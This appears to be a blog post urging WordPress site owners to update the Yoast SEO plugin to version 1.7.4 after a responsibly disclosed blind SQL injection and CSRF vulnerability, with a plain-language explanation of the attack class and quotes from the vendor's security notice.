Millions of WordPress sites have been exposed to a Blind SQL Injection vulnerability due to a security hole in the very popular Yoast SEO plugin. The plugin has been updated by makers, so make sure to update your plugin ASAP.
The Yoast WordPress SEO Plugin is used by over 1+ Million WordPress websites (see their downloads) and has reportedly been open to an exploit where hackers can do a Blind SQL injection for goodness knows how long.
A Blind SQL Injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.
It can be used to insert an SQL query into the database to either extract data, modify data or delete data. It is most often used to insert unwanted or unauthorized affiliate, spam links, or malware/adware on sites. These are thelittle nasties that you don;t notice for ages, unless you have a malware scan going…
To fix the issue, upgrade to version 1.7.4 immediately.
This version is documented to be a security fix based on what Ryan Dewhurst found during a security scan. For the geeks and techies among us, the official security fix says:
Security fix: fixed possible CSRF and blind SQL injection vulnerabilities in bulk editor. Added strict sanitation to order_by and order params. Added extra nonce checks on requests sending additional parameters. Minimal capability needed to access the bulk editor is now Editor. Thanks Ryan Dewhurst from WPScan for discovering and responsibly disclosing this issue.
From Yoast in email this morning:
On Wednesday we pushed a security release to our WordPress SEO plugin. Joost wrote about what we fixed and how we rolled out the update in this post. In short, if you haven’t updated your WordPress SEO plugin yet, free or premium, update!
Yoast announced that the WordPress team actually automatically pushed an update to WordPress installs that run an older version of this plugin. So many sites running this should be automatically updated.
But go ahead and login to your to double check…